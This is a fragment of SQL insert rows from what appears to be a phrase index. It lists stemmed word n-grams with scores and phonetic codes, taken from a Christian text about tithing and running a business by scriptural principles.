(238395, 'by environmental permutation', 'by environmental permutation', 0, 1, 1.9333, 'B51653416535', 1, '*'),
(238396, 'by inspiration', 'by inspiration', 0, 1, 1.4667, 'B521635', 1, '*'),
(238397, 'by inspiration not', 'by inspiration not', 0, 1, 1.6, 'B5216353', 1, '*'),
(238398, 'by so', 'by so', 0, 1, 1.1667, 'B200', 1, '*'),
(238399, 'by so doing', 'by so doing', 0, 1, 1.3667, 'B2352', 1, '*'),
(238400, 'by sowing', 'by sowing', 0, 1, 1.3, 'B252', 1, '*'),
(238401, 'by sowing seeds', 'by sowing seeds', 0, 1, 1.5, 'B25232', 1, '*'),
(238402, 'c lt', 'c lt', 0, 1, 1.1333, 'C430', 1, '*'),
(238403, 'c lt secures', 'c lt secures', 0, 1, 1.4, 'C43262', 1, '*'),
(238404, 'c prepare', 'c prepare', 0, 1, 1.3, 'C1616', 1, '*'),
(238405, 'c prepare well', 'c prepare well', 0, 1, 1.4667, 'C16164', 1, '*'),
(238406, 'calling and the', 'call and the', 0, 1, 1.5, 'C45253', 1, '*'),
(238407, 'can become', 'can become', 0, 1, 1.3333, 'C5125', 1, '*'),
(238408, 'can become when', 'can become when', 0, 1, 1.5, 'C5125', 1, '*'),
(238409, 'can dry', 'can dry', 0, 1, 1.2333, 'C536', 1, '*'),
(238410, 'can dry up', 'can dry up', 0, 1, 1.3333, 'C5361', 1, '*'),
(238411, 'can eat', 'can eat', 0, 1, 1.2333, 'C530', 1, '*'),
(238412, 'can eat up', 'can eat up', 0, 1, 1.3333, 'C531', 1, '*'),
(238413, 'can make from', 'can make from', 0, 1, 1.4333, 'C52165', 1, '*'),
(238414, 'can\'t plan', 'can plan', 0, 1, 1.3333, 'C53145', 1, '*'),
(238415, 'can\'t plan to', 'can plan to', 0, 1, 1.4333, 'C531453', 1, '*'),
(238416, 'careless such', 'careless such', 0, 1, 1.4333, 'C642', 1, '*'),
(238417, 'careless such that', 'careless such that', 0, 1, 1.6, 'C6423', 1, '*'),
(238418, 'certain percentage', 'certain percentage', 0, 1, 1.6, 'C635162532', 1, '*'),
(238419, 'certain percentage of', 'certain percentage of', 0, 1, 1.7, 'C6351625321', 1, '*'),
(238420, 'cheat your', 'cheat your', 0, 1, 1.3333, 'C360', 1, '*'),
(238421, 'cheat your customers', 'cheat your customers', 0, 1, 1.6667, 'C3623562', 1, '*'),
(238422, 'chronicles', 'chronicl', 0, 0, 0.6667, 'C65242', 1, '*'),
(238423, 'chronicles 31', 'chronicl 31', 0, 1, 1.4333, 'C65242', 1, '*'),
(238424, 'chronicles 31 5', 'chronicl 31 5', 0, 1, 1.5, 'C65242', 1, '*'),
(238425, 'command always', 'command always', 0, 1, 1.4667, 'C5342', 1, '*'),
(238426, 'command always ablessing', 'command always ablessing', 0, 1, 1.8, 'C534214252', 1, '*'),
(238427, 'commensurate', 'commensur', 0, 0, 0.8, 'C5263', 1, '*'),
(238428, 'commensurate take', 'commensur take', 0, 1, 1.5667, 'C52632', 1, '*'),
(238429, 'commensurate take off', 'commensur take off', 0, 1, 1.7, 'C526321', 1, '*'),
(238430, 'commensurate to', 'commensur to', 0, 1, 1.5, 'C5263', 1, '*'),
(238431, 'commensurate to the', 'commensur to the', 0, 1, 1.6333, 'C5263', 1, '*'),
(238432, 'common', 'common', 0, 0, 0.4, 'C500', 2, '*'),
(238433, 'common outcome', 'common outcome', 0, 1, 1.4667, 'C5325', 1, '*'),
(238434, 'common outcome that', 'common outcome that', 0, 1, 1.6333, 'C53253', 1, '*'),
(238435, 'company', 'compani', 0, 0, 0.4667, 'C515', 1, '*'),
(238436, 'company and', 'compani and', 0, 1, 1.3667, 'C5153', 1, '*'),
(238437, 'company and your', 'compani and your', 0, 1, 1.5333, 'C51536', 1, '*'),
(238438, 'conclusion learn', 'conclus learn', 0, 1, 1.5333, 'C52425465', 1, '*'),
(238439, 'conclusion learn to', 'conclus learn to', 0, 1, 1.6333, 'C524254653', 1, '*'),
(238440, 'condition can', 'condit can', 0, 1, 1.4333, 'C53525', 1, '*'),
(238441, 'condition can dry', 'condit can dry', 0, 1, 1.5667, 'C5352536', 1, '*'),
(238442, 'connect your', 'connect your', 0, 1, 1.4, 'C5236', 1, '*'),
(238443, 'connect your business', 'connect your business', 0, 1, 1.7, 'C52361252', 1, '*'),
(238444, 'consider the following', 'consid the following', 0, 1, 1.7333, 'C523631452', 1, '*'),
(238445, 'constant and', 'constant and', 0, 1, 1.4, 'C5235353', 1, '*'),
(238446, 'constant and regular', 'constant and regular', 0, 1, 1.6667, 'C52353536246', 1, '*'),
(238447, 'continuity', 'continu', 0, 0, 0.6667, 'C5353', 1, '*'),
(238448, 'continuity no', 'continu no', 0, 1, 1.4333, 'C53535', 1, '*'),
(238449, 'continuity no environmental', 'continu no environmental', 0, 1, 1.9, 'C5353516534', 1, '*'),
(238450, 'corners', 'corner', 0, 0, 0.4667, 'C6562', 1, '*'),
(238451, 'corners pay', 'corner pay', 0, 1, 1.3667, 'C65621', 1, '*'),
(238452, 'corners pay your', 'corner pay your', 0, 1, 1.5333, 'C656216', 1, '*'),
(238453, 'covenant b', 'coven b', 0, 1, 1.3333, 'C1531', 1, '*'),
(238454, 'covenant b ltensures', 'coven b ltensures', 0, 1, 1.6667, 'C1531435262', 1, '*'),
(238455, 'covenant that', 'coven that', 0, 1, 1.4333, 'C153', 1, '*'),
(238456, 'covenant that devourer', 'coven that devourer', 0, 1, 1.7333, 'C15316', 1, '*'),
(238457, 'crucial do', 'crucial do', 0, 1, 1.3333, 'C6243', 1, '*'),
(238458, 'crucial do not', 'crucial do not', 0, 1, 1.4667, 'C624353', 1, '*'),
(238459, 'crucial you', 'crucial you', 0, 1, 1.3667, 'C624', 1, '*'),
(238460, 'crucial you can\'t', 'crucial you can', 0, 1, 1.5667, 'C624253', 1, '*'),
(238461, 'customers', 'custom', 0, 0, 0.6, 'C3562', 1, '*'),
(238462, 'customers 11', 'custom 11', 0, 1, 1.4, 'C3562', 1, '*'),
(238463, 'customers 11 be', 'custom 11 be', 0, 1, 1.5, 'C35621', 1, '*'),
(238464, 'cut corners', 'cut corners', 0, 1, 1.3667, 'C326562', 1, '*'),
(238465, 'cut corners pay', 'cut corners pay', 0, 1, 1.5, 'C3265621', 1, '*'),
(238466, 'd', 'd', 0, 0, 0.0667, 'D000', 2, '*'),
(238467, 'd you', 'd you', 0, 1, 1.1667, 'D000', 1, '*'),
(238468, 'd you should', 'd you should', 0, 1, 1.4, 'D243', 1, '*'),
(238469, 'details about', 'detail about', 0, 1, 1.4333, 'D4213', 1, '*'),
(238470, 'details about the', 'detail about the', 0, 1, 1.5667, 'D4213', 1, '*'),
(238471, 'details c', 'detail c', 0, 1, 1.3, 'D420', 1, '*'),
(238472, 'details c prepare', 'detail c prepare', 0, 1, 1.5667, 'D421616', 1, '*'),
(238473, 'details from', 'detail from', 0, 1, 1.4, 'D42165', 1, '*'),
(238474, 'details from every', 'detail from every', 0, 1, 1.6, 'D4216516', 1, '*'),
(238475, 'deuteronomy', 'deuteronomi', 0, 0, 0.7333, 'D650', 1, '*'),
(238476, 'deuteronomy 28', 'deuteronomi 28', 0, 1, 1.4667, 'D650', 1, '*'),
(238477, 'deuteronomy 28 8', 'deuteronomi 28 8', 0, 1, 1.5333, 'D650', 1, '*'),
(238478, 'devourer', 'devour', 0, 0, 0.5333, 'D160', 1, '*'),
(238479, 'devourer is', 'devour is', 0, 1, 1.3667, 'D162', 1, '*'),
(238480, 'devourer is rebuked', 'devour is rebuked', 0, 1, 1.6333, 'D1626123', 1, '*'),
(238481, 'dimension', 'dimens', 0, 0, 0.6, 'D525', 3, '*'),
(238482, 'dimension for', 'dimens for', 0, 1, 1.4333, 'D52516', 1, '*'),
(238483, 'dimension for example', 'dimens for example', 0, 1, 1.7, 'D525162514', 1, '*'),
(238484, 'direction of', 'direct of', 0, 1, 1.4, 'D62351', 2, '*'),
(238485, 'direction of your', 'direct of your', 0, 1, 1.5667, 'D623516', 2, '*'),
(238486, 'direction that', 'direct that', 0, 1, 1.4667, 'D62353', 1, '*'),
(238487, 'direction that will', 'direct that will', 0, 1, 1.6333, 'D623534', 1, '*'),
(238488, 'directs', 'direct', 0, 0, 0.4667, 'D6232', 1, '*'),
(238489, 'directs it', 'direct it', 0, 1, 1.3333, 'D62323', 1, '*'),
(238490, 'directs it while', 'direct it while', 0, 1, 1.5333, 'D623234', 1, '*'),
(238491, 'divine favor', 'divin favor', 0, 1, 1.4, 'D1516', 1, '*'),
(238492, 'divine favor 5', 'divin favor 5', 0, 1, 1.4667, 'D1516', 1, '*'),
(238493, 'divine flows', 'divin flows', 0, 1, 1.4, 'D15142', 1, '*'),
(238494, 'divine flows and', 'divin flows and', 0, 1, 1.5333, 'D1514253', 1, '*'),
(238495, 'divine idea', 'divin idea', 0, 1, 1.3667, 'D153', 1, '*'),
(238496, 'divine idea at', 'divin idea at', 0, 1, 1.4667, 'D153', 1, '*'),
(238497, 'divine idea let', 'divin idea let', 0, 1, 1.5, 'D15343', 1, '*'),
(238498, 'divine names', 'divin names', 0, 1, 1.4, 'D152', 1, '*'),
(238499, 'divine names will', 'divin names will', 0, 1, 1.5667, 'D1524', 1, '*'),
(238500, 'divine steps', 'divin steps', 0, 1, 1.4, 'D152312', 1, '*'),
(238501, 'divine steps press', 'divin steps press', 0, 1, 1.6, 'D152312162', 1, '*'),
(238502, 'do business', 'do business', 0, 1, 1.3667, 'D1252', 1, '*'),
(238503, 'do business ordinarily', 'do business ordinarily', 0, 1, 1.7333, 'D125263564', 1, '*'),
(238504, 'do business scripturally', 'do business scripturally', 0, 1, 1.8, 'D125261364', 1, '*'),
(238505, 'do not allow', 'do not allow', 0, 1, 1.4, 'D534', 1, '*'),
(238506, 'do not assume', 'do not assume', 0, 1, 1.4333, 'D5325', 1, '*'),
(238507, 'do not eat', 'do not eat', 0, 1, 1.3333, 'D530', 1, '*'),
(238508, 'do not ever', 'do not ever', 0, 1, 1.3667, 'D5316', 1, '*'),
(238509, 'do not limit', 'do not limit', 0, 1, 1.4, 'D53453', 1, '*'),
(238510, 'do not spare', 'do not spare', 0, 1, 1.4, 'D53216', 1, '*'),
(238511, 'do three', 'do three', 0, 1, 1.2667, 'D600', 1, '*'),
(238512, 'do three things', 'do three things', 0, 1, 1.5, 'D6352', 1, '*'),
(238513, 'doing get', 'do get', 0, 1, 1.3, 'D523', 1, '*'),
(238514, 'doing get a', 'do get a', 0, 1, 1.3667, 'D523', 1, '*'),
(238515, 'doing you engage', 'do you engage', 0, 1, 1.5333, 'D5252', 1, '*'),
(238516, 'don\'t be careless', 'don be careless', 0, 1, 1.5667, 'D5312642', 1, '*'),
(238517, 'don\'t cheat', 'don cheat', 0, 1, 1.3667, 'D5323', 1, '*'),
(238518, 'don\'t cheat your', 'don cheat your', 0, 1, 1.5333, 'D53236', 1, '*'),
(238519, 'don\'t cut', 'don cut', 0, 1, 1.3, 'D5323', 1, '*'),
(238520, 'don\'t cut corners', 'don cut corners', 0, 1, 1.5667, 'D532326562', 1, '*'),
(238521, 'don\'t just pick', 'don just pick', 0, 1, 1.5, 'D532312', 1, '*'),
(238522, 'don\'t let business', 'don let business', 0, 1, 1.6, 'D53431252', 1, '*'),
(238523, 'don\'t pick', 'don pick', 0, 1, 1.3333, 'D5312', 1, '*'),
(238524, 'don\'t pick an', 'don pick an', 0, 1, 1.4333, 'D53125', 1, '*'),
(238525, 'done is', 'done is', 0, 1, 1.2333, 'D520', 1, '*'),
(238526, 'done is that', 'done is that', 0, 1, 1.4, 'D523', 1, '*'),
(238527, 'draw divine', 'draw divine', 0, 1, 1.3667, 'D6315', 1, '*'),
(238528, 'draw divine favor', 'draw divine favor', 0, 1, 1.5667, 'D631516', 1, '*'),
(238529, 'drawn', 'drawn', 0, 0, 0.3333, 'D650', 1, '*'),
(238530, 'drawn a', 'drawn a', 0, 1, 1.2333, 'D650', 1, '*'),
(238531, 'drawn a limiting', 'drawn a limiting', 0, 1, 1.5333, 'D6545352', 1, '*'),
(238532, 'draws the', 'draw the', 0, 1, 1.3, 'D623', 1, '*'),
(238533, 'draws the scope', 'draw the scope', 0, 1, 1.5, 'D62321', 1, '*'),
(238534, 'dry', 'dry', 0, 0, 0.2, 'D600', 1, '*'),
(238535, 'dry up', 'dry up', 0, 1, 1.2, 'D610', 1, '*'),
(238536, 'dry up your', 'dry up your', 0, 1, 1.3667, 'D616', 1, '*'),
(238537, 'due upon', 'due upon', 0, 1, 1.2667, 'D150', 1, '*'),
(238538, 'due upon your', 'due upon your', 0, 1, 1.4333, 'D156', 1, '*'),
(238539, 'earmarked', 'earmark', 0, 0, 0.6, 'E65623', 1, '*'),
(238540, 'earmarked for', 'earmark for', 0, 1, 1.4333, 'E6562316', 1, '*'),
(238541, 'earmarked for the', 'earmark for the', 0, 1, 1.5667, 'E65623163', 1, '*'),
(238542, 'eat up', 'eat up', 0, 1, 1.2, 'E310', 1, '*'),
(238543, 'eat up your', 'eat up your', 0, 1, 1.3667, 'E316', 1, '*'),
(238544, 'eat your', 'eat your', 0, 1, 1.2667, 'E360', 1, '*'),
(238545, 'eat your first', 'eat your first', 0, 1, 1.4667, 'E361623', 1, '*'),
(238546, 'effortlessly', 'effortlessli', 0, 0, 0.8, 'E163424', 1, '*'),
(238547, 'effortlessly into', 'effortlessli into', 0, 1, 1.5667, 'E16342453', 1, '*'),
(238548, 'effortlessly into your', 'effortlessli into your', 0, 1, 1.7333, 'E163424536', 1, '*'),
(238549, 'employees', 'employe', 0, 0, 0.6, 'E5142', 1, '*'),
(238550, 'employees and', 'employe and', 0, 1, 1.4333, 'E514253', 1, '*'),
(238551, 'employees and don\'t', 'employe and don', 0, 1, 1.6333, 'E51425353', 1, '*'),
(238552, 'employers', 'employ', 0, 0, 0.6, 'E51462', 1, '*'),
(238553, 'employers of', 'employ of', 0, 1, 1.4, 'E514621', 1, '*'),
(238554, 'employers of labor', 'employ of labor', 0, 1, 1.6, 'E514621416', 1, '*'),
(238555, 'engage in so', 'engag in so', 0, 1, 1.4, 'E5252', 1, '*'),
(238556, 'engage the', 'engag the', 0, 1, 1.3333, 'E523', 1, '*'),
(238557, 'engage the force', 'engag the force', 0, 1, 1.5333, 'E523162', 1, '*'),
(238558, 'enjoy outcomes', 'enjoi outcomes', 0, 1, 1.4667, 'E523252', 1, '*'),
(238559, 'enjoy outcomes in', 'enjoi outcomes in', 0, 1, 1.5667, 'E5232525', 1, '*'),
(238560, 'enough to', 'enough to', 0, 1, 1.3, 'E523', 2, '*'),
(238561, 'enough to have', 'enough to have', 0, 1, 1.4667, 'E5231', 1, '*'),
(238562, 'ensure', 'ensur', 0, 0, 0.4, 'E526', 1, '*'),
(238563, 'ensure continuity', 'ensur continuity', 0, 1, 1.5667, 'E52625353', 1, '*'),
(238564, 'ensure continuity no', 'ensur continuity no', 0, 1, 1.6667, 'E526253535', 1, '*'),
(238565, 'ensure that', 'ensur that', 0, 1, 1.3667, 'E5263', 1, '*'),
(238566, 'ensure that you', 'ensur that you', 0, 1, 1.5, 'E5263', 1, '*'),
(238567, 'environment', 'environ', 0, 0, 0.7333, 'E51653', 1, '*'),
(238568, 'environment rather', 'environ rather', 0, 1, 1.6, 'E51653636', 1, '*'),
(238569, 'environment rather wait', 'environ rather wait', 0, 1, 1.7667, 'E516536363', 1, '*'),
(238570, 'environmental', 'environment', 0, 0, 0.8667, 'E516534', 1, '*'),
(238571, 'environmental condition', 'environment condition', 0, 1, 1.7667, 'E5165342535', 1, '*'),
(238572, 'environmental condition can', 'environment condition can', 0, 1, 1.9, 'E516534253525', 1, '*'),
(238573, 'environmental permutation', 'environment permutation', 0, 1, 1.8333, 'E51653416535', 1, '*'),
(238574, 'environmental permutation divine', 'environment permutation divine', 0, 1, 2, 'E51653416535315', 1, '*'),
(238575, 'error and thus', 'error and thus', 0, 1, 1.4667, 'E6532', 1, '*'),
(238576, 'established', 'establish', 0, 0, 0.7333, 'E231423', 1, '*'),
(238577, 'established 2', 'establish 2', 0, 1, 1.4333, 'E231423', 1, '*'),
(238578, 'established 2 sow', 'establish 2 sow', 0, 1, 1.5667, 'E2314232', 1, '*'),
(238579, 'even sometimes', 'even sometimes', 0, 1, 1.4667, 'E1525352', 1, '*'),
(238580, 'even sometimes failures', 'even sometimes failures', 0, 1, 1.7667, 'E15253521462', 1, '*'),
(238581, 'ever operate', 'ever operate', 0, 1, 1.4, 'E16163', 1, '*'),
(238582, 'ever operate a', 'ever operate a', 0, 1, 1.4667, 'E16163', 1, '*'),
(238583, 'every idea', 'everi idea', 0, 1, 1.3333, 'E163', 1, '*'),
(238584, 'every idea from', 'everi idea from', 0, 1, 1.5, 'E163165', 1, '*'),
(238585, 'every necessary', 'everi necessary', 0, 1, 1.5, 'E16526', 1, '*'),
(238586, 'every necessary quarter', 'everi necessary quarter', 0, 1, 1.7667, 'E165262636', 1, '*'),
(238587, 'every other natural', 'everi other natural', 0, 1, 1.6333, 'E16365364', 1, '*'),
(238588, 'everybody is', 'everybodi is', 0, 1, 1.4, 'E16132', 1, '*'),
(238589, 'everybody is doing', 'everybodi is doing', 0, 1, 1.6, 'E16132352', 1, '*'),
(238590, 'example god', 'exampl god', 0, 1, 1.3667, 'E251423', 1, '*'),
(238591, 'example god gives', 'exampl god gives', 0, 1, 1.5667, 'E251423212', 1, '*'),
(238592, 'excellence', 'excel', 0, 0, 0.6667, 'E2452', 2, '*'),
(238593, 'excellence is', 'excel is', 0, 1, 1.4333, 'E2452', 1, '*'),
(238594, 'excellence is not', 'excel is not', 0, 1, 1.5667, 'E245253', 1, '*'),
(238595, 'executing', 'execut', 0, 0, 0.6, 'E2352', 1, '*'),
(238596, 'executing do', 'execut do', 0, 1, 1.4, 'E23523', 1, '*'),
(238597, 'executing do it', 'execut do it', 0, 1, 1.5, 'E23523', 1, '*'),
(238598, 'expanse', 'expans', 0, 0, 0.4667, 'E2152', 1, '*'),
(238599, 'expanse and', 'expans and', 0, 1, 1.3667, 'E215253', 1, '*'),
(238600, 'expanse and of', 'expans and of', 0, 1, 1.4667, 'E2152531', 1, '*'),
(238601, 'expectation', 'expect', 0, 0, 0.7333, 'E21235', 1, '*'),
(238602, 'expectation for', 'expect for', 0, 1, 1.5, 'E2123516', 1, '*'),
(238603, 'expectation for his', 'expect for his', 0, 1, 1.6333, 'E21235162', 1, '*'),
(238604, 'expects you', 'expect you', 0, 1, 1.3667, 'E21232', 1, '*'),
(238605, 'expects you to', 'expect you to', 0, 1, 1.4667, 'E212323', 1, '*'),
(238606, 'expression', 'express', 0, 0, 0.6667, 'E21625', 1, '*'),
(238607, 'expression of', 'express of', 0, 1, 1.4333, 'E216251', 1, '*'),
(238608, 'expression of god\'s', 'express of god', 0, 1, 1.6333, 'E216251232', 1, '*'),
(238609, 'failures', 'failur', 0, 0, 0.5333, 'F462', 1, '*'),
(238610, 'failures but', 'failur but', 0, 1, 1.4, 'F46213', 1, '*'),
(238611, 'failures but may', 'failur but may', 0, 1, 1.5333, 'F462135', 1, '*'),
(238612, 'faithful tither', 'faith tither', 0, 1, 1.5, 'F31436', 1, '*'),
(238613, 'faithful tither pay', 'faith tither pay', 0, 1, 1.6333, 'F314361', 1, '*'),
(238614, 'faithful tither you', 'faith tither you', 0, 1, 1.6333, 'F31436', 1, '*'),
(238615, 'faithful with', 'faith with', 0, 1, 1.4333, 'F3143', 1, '*'),
(238616, 'faithful with your', 'faith with your', 0, 1, 1.6, 'F31436', 1, '*'),
(238617, 'famous', 'famou', 0, 0, 0.4, 'F520', 1, '*'),
(238618, 'famous or', 'famou or', 0, 1, 1.3, 'F526', 1, '*'),
(238619, 'famous or because', 'famou or because', 0, 1, 1.5667, 'F52612', 1, '*'),
(238620, 'favor', 'favor', 0, 0, 0.3333, 'F600', 1, '*'),
(238621, 'favor 5', 'favor 5', 0, 1, 1.2333, 'F600', 1, '*'),
(238622, 'favor 5 press', 'favor 5 press', 0, 1, 1.4333, 'F6162', 1, '*'),
(238623, 'finding', 'find', 0, 0, 0.4667, 'F5352', 1, '*'),
(238624, 'finding out', 'find out', 0, 1, 1.3667, 'F53523', 1, '*'),
(238625, 'finding out details', 'find out details', 0, 1, 1.6333, 'F5352342', 1, '*'),
(238626, 'first fruit', 'first fruit', 0, 1, 1.3667, 'F623163', 1, '*'),
(238627, 'first fruit of', 'first fruit of', 0, 1, 1.4667, 'F6231631', 1, '*'),
(238628, 'first fruit seed', 'first fruit seed', 0, 1, 1.5333, 'F62316323', 1, '*'),
(238629, 'first fruit then', 'first fruit then', 0, 1, 1.5333, 'F6231635', 1, '*'),
(238630, 'first fruit will', 'first fruit will', 0, 1, 1.5333, 'F6231634', 1, '*'),
(238631, 'first one', 'first one', 0, 1, 1.3, 'F6235', 1, '*'),
(238632, 'first one tenth', 'first one tenth', 0, 1, 1.5, 'F6235353', 1, '*'),
(238633, 'five-naira', 'five-naira', 0, 0, 0.6667, 'F560', 1, '*'),
(238634, 'five-naira transparent', 'five-naira transparent', 0, 1, 1.7333, 'F5636521653', 1, '*'),
(238635, 'five-naira transparent nylon', 'five-naira transparent nylon', 0, 1, 1.9333, 'F5636521653545', 1, '*'),
(238636, 'flow effortlessly', 'flow effortlessly', 0, 1, 1.5667, 'F4163424', 1, '*'),
(238637, 'flow effortlessly into', 'flow effortlessly into', 0, 1, 1.7333, 'F416342453', 1, '*'),
(238638, 'flows and', 'flow and', 0, 1, 1.3, 'F4253', 1, '*'),
(238639, 'flows and harvest', 'flow and harvest', 0, 1, 1.5667, 'F42536123', 1, '*'),
(238640, 'follow all', 'follow all', 0, 1, 1.3333, 'F400', 1, '*'),
(238641, 'follow all necessary', 'follow all necessary', 0, 1, 1.6667, 'F4526', 1, '*'),
(238642, 'following steps', 'follow steps', 0, 1, 1.5, 'F452312', 1, '*'),
(238643, 'following steps that', 'follow steps that', 0, 1, 1.6667, 'F4523123', 1, '*'),
(238644, 'for d', 'for d', 0, 1, 1.1667, 'F630', 1, '*'),
(238645, 'for d you', 'for d you', 0, 1, 1.3, 'F630', 1, '*'),
(238646, 'for divine steps', 'for divine steps', 0, 1, 1.5333, 'F63152312', 1, '*'),
(238647, 'for example', 'for example', 0, 1, 1.3667, 'F62514', 3, '*'),
(238648, 'for example god', 'for example god', 0, 1, 1.5, 'F6251423', 1, '*'),
(238649, 'for his people', 'for his people', 0, 1, 1.4667, 'F6214', 1, '*'),
(238650, 'for information', 'for information', 0, 1, 1.5, 'F6516535', 1, '*'),
(238651, 'for information and', 'for information and', 0, 1, 1.6333, 'F65165353', 1, '*'),
(238652, 'for occultic', 'for occultic', 0, 1, 1.4, 'F62432', 1, '*'),
(238653, 'for occultic in-roads', 'for occultic in-roads', 0, 1, 1.7, 'F624325632', 1, '*'),
(238654, 'for the blessings', 'for the blessings', 0, 1, 1.5667, 'F6314252', 1, '*'),
(238655, 'for the business', 'for the business', 0, 1, 1.5333, 'F631252', 1, '*'),
(238656, 'for the expression', 'for the expression', 0, 1, 1.6, 'F6321625', 1, '*'),
(238657, 'for your business', 'for your business', 0, 1, 1.5667, 'F61252', 1, '*'),
(238658, 'for your sake', 'for your sake', 0, 1, 1.4333, 'F620', 1, '*'),
(238659, 'force of', 'forc of', 0, 1, 1.2667, 'F621', 1, '*'),
(238660, 'force of the', 'forc of the', 0, 1, 1.4, 'F6213', 1, '*'),
(238661, 'forms', 'form', 0, 0, 0.3333, 'F652', 1, '*'),
(238662, 'forms of', 'form of', 0, 1, 1.2667, 'F6521', 1, '*'),
(238663, 'forms of groundnut', 'form of groundnut', 0, 1, 1.6, 'F6521265353', 1, '*'),
(238664, 'forth in prayer', 'forth in prayer', 0, 1, 1.5, 'F63516', 1, '*'),
(238665, 'from a', 'from a', 0, 1, 1.2, 'F650', 2, '*'),
(238666, 'from a higher', 'from a higher', 0, 1, 1.4333, 'F6526', 1, '*'),
(238667, 'from every', 'from every', 0, 1, 1.3333, 'F6516', 2, '*'),
(238668, 'from every necessary', 'from every necessary', 0, 1, 1.6667, 'F6516526', 1, '*'),
(238669, 'from god will', 'from god will', 0, 1, 1.4333, 'F65234', 1, '*'),
(238670, 'from groundnut', 'from groundnut', 0, 1, 1.4667, 'F65265353', 1, '*'),
(238671, 'from groundnut like', 'from groundnut like', 0, 1, 1.6333, 'F6526535342', 1, '*'),
(238672, 'from that business', 'from that business', 0, 1, 1.6, 'F6531252', 1, '*'),
(238673, 'from your environment', 'from your environment', 0, 1, 1.7, 'F65651653', 1, '*'),
(238674, 'fruit seed', 'fruit seed', 0, 1, 1.3333, 'F6323', 1, '*'),
(238675, 'fruit seed this', 'fruit seed this', 0, 1, 1.5, 'F63232', 1, '*'),
(238676, 'fruit then', 'fruit then', 0, 1, 1.3333, 'F635', 1, '*'),
(238677, 'fruit then always', 'fruit then always', 0, 1, 1.5667, 'F63542', 1, '*'),
(238678, 'fruit will', 'fruit will', 0, 1, 1.3333, 'F634', 1, '*'),
(238679, 'fruit will do', 'fruit will do', 0, 1, 1.4333, 'F6343', 1, '*'),
(238680, 'fulfill all', 'fulfil all', 0, 1, 1.3667, 'F414', 1, '*'),
(238681, 'fulfill all righteousness', 'fulfil all righteousness', 0, 1, 1.8333, 'F414623252', 1, '*'),
(238682, 'function at', 'function at', 0, 1, 1.3667, 'F52353', 1, '*'),
(238683, 'function at the', 'function at the', 0, 1, 1.5, 'F52353', 1, '*'),
(238684, 'further in', 'further in', 0, 1, 1.3333, 'F6365', 1, '*'),
(238685, 'further in finding', 'further in finding', 0, 1, 1.6, 'F636515352', 1, '*'),
(238686, 'further in prayer', 'further in prayer', 0, 1, 1.5667, 'F636516', 1, '*'),
(238687, 'further in the', 'further in the', 0, 1, 1.4667, 'F63653', 1, '*'),
(238688, 'future give', 'futur give', 0, 1, 1.3667, 'F3621', 1, '*'),
(238689, 'future give you', 'futur give you', 0, 1, 1.5, 'F3621', 1, '*'),
(238690, 'future of your', 'futur of your', 0, 1, 1.4667, 'F3616', 1, '*'),
(238691, 'get a', 'get a', 0, 1, 1.1667, 'G300', 2, '*'),
(238692, 'get a word', 'get a word', 0, 1, 1.3333, 'G363', 1, '*'),
(238693, 'give room', 'give room', 0, 1, 1.3, 'G165', 1, '*'),
(238694, 'give room for', 'give room for', 0, 1, 1.4333, 'G16516', 1, '*'),
(238695, 'give to', 'give to', 0, 1, 1.2333, 'G130', 1, '*'),
(238696, 'give to these', 'give to these', 0, 1, 1.4333, 'G132', 1, '*'),
(238697, 'gives you a', 'give you a', 0, 1, 1.3667, 'G120', 1, '*'),
(238698, 'gives you an', 'give you an', 0, 1, 1.4, 'G125', 1, '*'),
(238699, 'global', 'global', 0, 0, 0.4, 'G414', 1, '*'),
(238700, 'global mindset', 'global mindset', 0, 1, 1.4667, 'G4145323', 1, '*'),
(238701, 'global mindset and', 'global mindset and', 0, 1, 1.6, 'G414532353', 1, '*'),
(238702, 'global operate', 'global operate', 0, 1, 1.4667, 'G414163', 1, '*'),
(238703, 'global operate in', 'global operate in', 0, 1, 1.5667, 'G4141635', 1, '*'),
(238704, 'god 7', 'god 7', 0, 1, 1.1667, 'G300', 1, '*'),
(238705, 'god 7 be', 'god 7 be', 0, 1, 1.2667, 'G310', 1, '*'),
(238706, 'god as the', 'god as the', 0, 1, 1.3333, 'G323', 1, '*'),
(238707, 'god b', 'god b', 0, 1, 1.1667, 'G310', 1, '*'),
(238708, 'god b every', 'god b every', 0, 1, 1.3667, 'G316', 1, '*'),
(238709, 'god be the', 'god be the', 0, 1, 1.3333, 'G313', 1, '*'),
(238710, 'god excellence', 'god excellence', 0, 1, 1.4667, 'G32452', 1, '*'),
(238711, 'god excellence is', 'god excellence is', 0, 1, 1.5667, 'G32452', 1, '*'),
(238712, 'god for divine', 'god for divine', 0, 1, 1.4667, 'G316315', 1, '*'),
(238713, 'god give', 'god give', 0, 1, 1.2667, 'G321', 1, '*'),
(238714, 'god give you', 'god give you', 0, 1, 1.4, 'G321', 1, '*'),
(238715, 'god has earmarked', 'god has earmarked', 0, 1, 1.5667, 'G3265623', 1, '*'),
(238716, 'god ifyou', 'god ifyou', 0, 1, 1.3, 'G310', 1, '*'),
(238717, 'god ifyou workout', 'god ifyou workout', 0, 1, 1.5667, 'G31623', 1, '*'),
(238718, 'god over', 'god over', 0, 1, 1.2667, 'G316', 1, '*'),
(238719, 'god over the', 'god over the', 0, 1, 1.4, 'G3163', 1, '*'),
(238720, 'god that are', 'god that are', 0, 1, 1.4, 'G360', 1, '*'),
(238721, 'god the house', 'god the house', 0, 1, 1.4333, 'G320', 1, '*'),
(238722, 'god the man', 'god the man', 0, 1, 1.3667, 'G350', 1, '*'),
(238723, 'god what will', 'god what will', 0, 1, 1.4333, 'G340', 1, '*'),
(238724, 'god who knows', 'god who knows', 0, 1, 1.4333, 'G3252', 1, '*'),
(238725, 'god will be', 'god will be', 0, 1, 1.3667, 'G341', 1, '*'),
(238726, 'god you should', 'god you should', 0, 1, 1.4667, 'G3243', 1, '*'),
(238727, 'god\'s blessing', 'god blessing', 0, 1, 1.4667, 'G3214252', 1, '*'),
(238728, 'god\'s blessing upon', 'god blessing upon', 0, 1, 1.6333, 'G321425215', 1, '*'),
(238729, 'god\'s expectation', 'god expectation', 0, 1, 1.5667, 'G321235', 1, '*'),
(238730, 'god\'s expectation for', 'god expectation for', 0, 1, 1.7, 'G32123516', 1, '*'),
(238731, 'god\'s kingdom and', 'god kingdom and', 0, 1, 1.5667, 'G3252353', 1, '*'),
(238732, 'god\'s kingdom in', 'god kingdom in', 0, 1, 1.5333, 'G325235', 1, '*'),
(238733, 'going global', 'go global', 0, 1, 1.4, 'G52414', 1, '*'),
(238734, 'going global operate', 'go global operate', 0, 1, 1.6667, 'G52414163', 1, '*'),
